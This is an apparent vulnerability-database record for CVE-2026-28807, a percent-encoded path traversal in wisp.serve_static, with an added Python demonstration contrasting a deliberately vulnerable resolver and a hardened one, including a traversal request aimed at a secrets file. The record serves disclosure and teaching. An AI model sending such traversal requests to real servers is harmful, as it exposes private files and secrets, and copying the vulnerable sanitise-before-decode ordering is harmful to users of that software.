CVE-2026-28807 (GCVE-0-2026-28807)
Vulnerability from cvelistv5 – Published: 2026-03-10 21:34 – Updated: 2026-03-12 03:58
Title
Path Traversal in wisp.serve_static allows arbitrary file read
Summary
Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.
The wisp.serve_static function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.
An unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.
This issue affects wisp: from 2.1.1 before 2.2.1.
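As an added example (not wisp's own Gleam code), the Python model below re-creates the ordering defect described above: a `..` filter applied before percent-decoding lets `%2e%2e` survive, while decoding first and validating the decoded segments does not. The filter being a plain `replace("..", "")` and the static root `/srv/static` are assumptions made for the demonstration.

```python
"""Model of the sanitise-before-decode bug behind CVE-2026-28807.
Added example; the filter and the root directory are assumed, not wisp's code."""
import posixpath
from typing import Optional
from urllib.parse import unquote

ROOT = "/srv/static"  # assumed static root for the demonstration


def vulnerable_resolve(request_path: str) -> str:
    """Sanitise first, then decode: the order the advisory describes."""
    sanitised = request_path.replace("..", "")   # "%2e%2e" passes through unchanged
    decoded = unquote(sanitised)                  # ...and only now becomes "..", too late
    # normpath mirrors what the OS does with ".." when the file is opened.
    return posixpath.normpath(posixpath.join(ROOT, decoded.lstrip("/")))


def hardened_resolve(request_path: str) -> Optional[str]:
    """Decode exactly once, validate the decoded segments, then confine to ROOT."""
    decoded = unquote(request_path)
    if "\x00" in decoded:                          # NUL can truncate paths in C-level APIs
        return None
    segments = [s for s in decoded.split("/") if s]
    if any(seg in (".", "..") for seg in segments):
        return None                                # dot-segments are never valid here
    candidate = posixpath.normpath(posixpath.join(ROOT, *segments))
    # Lexical confinement check; symlinks inside ROOT still need a realpath
    # check at open time, which this model does not cover.
    if candidate != ROOT and not candidate.startswith(ROOT + "/"):
        return None
    return candidate


def escapes_root(path: str) -> bool:
    """True when a resolved path lies outside ROOT."""
    return path != ROOT and not path.startswith(ROOT + "/")


if __name__ == "__main__":
    # Constructed request paths: a normal file, a literal traversal the filter
    # does catch, and the percent-encoded form it does not.
    for req in ("/css/site.css", "/../css/site.css", "/%2e%2e/%2e%2e/app/secrets.env"):
        v = vulnerable_resolve(req)
        print(f"{req:34} vulnerable -> {v} (escapes root: {escapes_root(v)})")
        print(f"{'':34} hardened   -> {hardened_resolve(req)}")
```

A double-encoded request such as `/%252e%252e/x` decodes once to a literal `%2e%2e` segment, which the hardened version keeps as an ordinary file name rather than decoding again.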
Severity
CVSS 4.0 base score 8.7 (HIGH): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
EEF
References
| URL | Tags |
|---|---|
| https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r | vendor-advisory |
| https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93 | patch |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| gleam-wisp | wisp | Affected: 2.1.1 , < 2.2.1 (semver); pkg:hex/wisp@2.1.1 , < pkg:hex/wisp@2.2.1 (purl); cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:* |
Credits
John Downey (finder)
Louis Pilfold (remediation developer)
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-28807",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-11T14:20:19.768057Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-11T14:20:59.654Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"cpes": [
"cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"packageName": "wisp",
"packageURL": "pkg:hex/wisp",
"product": "wisp",
"repo": "https://github.com/gleam-wisp/wisp",
"vendor": "gleam-wisp",
"versions": [
{
"lessThan": "2.2.1",
"status": "affected",
"version": "2.1.1",
"versionType": "semver"
},
{
"lessThan": "pkg:hex/wisp@2.2.1",
"status": "affected",
"version": "pkg:hex/wisp@2.1.1",
"versionType": "purl"
}
]
},
{
"collectionURL": "https://github.com",
"cpes": [
"cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"packageName": "gleam-wisp/wisp",
"packageURL": "pkg:github/gleam-wisp/wisp",
"product": "wisp",
"repo": "https://github.com/gleam-wisp/wisp.git",
"vendor": "gleam-wisp",
"versions": [
{
"lessThan": "161118c431047f7ef1ff7cabfcc38981877fdd93",
"status": "affected",
"version": "129dcb1fe10ab1e676145d91477535e1c90ab550",
"versionType": "git"
},
{
"lessThan": "pkg:github/gleam-wisp/wisp@161118c431047f7ef1ff7cabfcc38981877fdd93",
"status": "affected",
"version": "pkg:github/gleam-wisp/wisp@129dcb1fe10ab1e676145d91477535e1c90ab550",
"versionType": "purl"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gleam-wisp:wisp:*:*:*:*:*:*:*:*",
"versionEndExcluding": "2.2.1",
"versionStartIncluding": "2.1.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "John Downey"
},
{
"lang": "en",
"type": "remediation developer",
"value": "Louis Pilfold"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\u003cp\u003eThe \u003ctt\u003ewisp.serve_static\u003c/tt\u003e function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence \u003ctt\u003e%2e%2e\u003c/tt\u003e passes through \u003ctt\u003estring.replace\u003c/tt\u003e unchanged, then \u003ctt\u003euri.percent_decode\u003c/tt\u003e converts it to \u003ctt\u003e..\u003c/tt\u003e, which the OS resolves as directory traversal when the file is read.\u003c/p\u003e\u003cp\u003eAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\u003c/p\u003e\u003cp\u003eThis issue affects wisp: from 2.1.1 before 2.2.1.\u003c/p\u003e"
}
],
"value": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027) vulnerability in gleam-wisp wisp allows arbitrary file read via percent-encoded path traversal.\n\nThe wisp.serve_static function is vulnerable to path traversal because sanitization runs before percent-decoding. The encoded sequence %2e%2e passes through string.replace unchanged, then uri.percent_decode converts it to .., which the OS resolves as directory traversal when the file is read.\n\nAn unauthenticated attacker can read any file readable by the application process in a single HTTP request, including application source code, configuration files, secrets, and system files.\n\nThis issue affects wisp: from 2.1.1 before 2.2.1."
}
],
"impacts": [
{
"capecId": "CAPEC-139",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-139 Relative Path Traversal"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-12T03:58:37.598Z",
"orgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
"shortName": "EEF"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://github.com/gleam-wisp/wisp/security/advisories/GHSA-h7cj-j2vv-qw8r"
},
{
"tags": [
"patch"
],
"url": "https://github.com/gleam-wisp/wisp/commit/161118c431047f7ef1ff7cabfcc38981877fdd93"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Path Traversal in wisp.serve_static allows arbitrary file read",
"x_generator": {
"engine": "Vulnogram 1.0.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "6b3ad84c-e1a6-4bf7-a703-f496b71e49db",
"assignerShortName": "EEF",
"cveId": "CVE-2026-28807",
"datePublished": "2026-03-10T21:34:47.859Z",
"dateReserved": "2026-03-03T14:40:00.590Z",
"dateUpdated": "2026-03-12T03:58:37.598Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.